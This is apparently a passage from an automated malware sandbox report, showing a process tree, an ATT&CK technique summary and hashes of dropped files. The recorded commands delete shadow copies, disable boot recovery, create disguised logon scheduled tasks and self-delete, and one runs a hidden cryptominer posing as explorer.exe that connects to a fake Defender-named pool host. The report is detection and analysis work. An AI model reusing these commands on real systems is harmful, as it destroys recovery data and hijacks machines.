                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:5636
                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:7916
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:1644
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                        wmic shadowcopy delete
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:9348
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                        notepad.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:10596
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                        notepad.exe
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:10076
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1EE4.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1EE4.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                        PID:6960
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\Update.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\Update.exe"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                          PID:9472
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Red1_.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Red1_.exe"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                            PID:9976
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Clip_.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Clip_.exe"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                            PID:5640
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:10108
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:6796
                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                    PID:1344
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:8556
                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:5036
                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                        PID:9116
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:10216
                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:6608
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:9516
                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:6520
                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                              PID:7832
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\VideoDriver.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\VideoDriver.exe"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:9944
                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:4284
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:1992
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:2804
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                                                                PID:8512
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\1EE4.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\1EE4.exe"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:6112
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                  ping 1.1.1.1 -n 1 -w 100
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                  PID:9184
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                  ping 1.1.1.1 -n 1 -w 900
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                  PID:9264
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:8360
                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:8560
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:9988
                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                    PID:4312
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:9416
                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                      PID:10200
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:7152
                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                        PID:9312
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:9480
                                                                                                                                                                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:10088
                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            PID:9720
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:9812
                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                              PID:9776
                                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{29cc6737-787d-6c43-9cf2-f96bf3ffb708}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                PID:8708
                                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                PID:6908
                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:2068
                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                PID:7388
                                                                                                                                                                                                                                                                              • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:4236
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                  PID:9836
                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                  PID:7016
                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                  PID:6084
                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                    MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                    PID:10956
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                  PID:4184
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  PID:5780
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  PID:10552
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  PID:10984
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  PID:11204
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  PID:6756

                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1031

                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1089

                                                                                                                                                                                                                                                                                File Deletion

                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                T1107

                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                T1081

                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                Software Discovery

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1518

                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1018

                                                                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                Impact

                                                                                                                                                                                                                                                                                Inhibit System Recovery

                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                T1490

                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  ce11de1000560d312bf6ab0b5327e87b

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  557f3f780cb0f694887ada330a87ba976cdb168f

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  126daa976d1eaec1bd68eb53748caa325fc537f865051dd0d5f09d599175861a

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  655b45bcf75a79c174caf6fae84560980511d068f67a89883f70b264e88983f729c604b3484fdcb8d8f8a83105e43d740fe70e7a006806136bc423453d769655

                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  ce11de1000560d312bf6ab0b5327e87b

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  557f3f780cb0f694887ada330a87ba976cdb168f

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  126daa976d1eaec1bd68eb53748caa325fc537f865051dd0d5f09d599175861a

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  655b45bcf75a79c174caf6fae84560980511d068f67a89883f70b264e88983f729c604b3484fdcb8d8f8a83105e43d740fe70e7a006806136bc423453d769655

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\7SrzRNSSzQZ1yRbsPelarolG.exe.log
                                                                                                                                                                                                                                                                                  MD5

